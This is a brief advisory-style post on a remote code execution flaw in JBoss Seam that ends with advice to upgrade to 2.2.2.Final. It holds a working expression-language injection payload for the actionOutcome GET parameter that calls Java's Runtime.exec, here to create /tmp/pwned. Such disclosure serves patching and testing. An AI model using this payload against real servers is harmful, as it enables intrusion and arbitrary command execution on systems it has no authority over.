It is possible to execute malware code on your server through Seam application using only browser's address bar. To check the issue add this to your GET parameters(works for Linux):
actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(expressions.getClass().forName('java.lang.Runtime')).exec('mkdir%20/tmp/pwned')}
This code will create 'pwned' directory in /tmp/ directory.
To close this vulnerability just update your JBoss Seam to 2.2.2.Final.
In this post I used the material of this article.To read more check these links: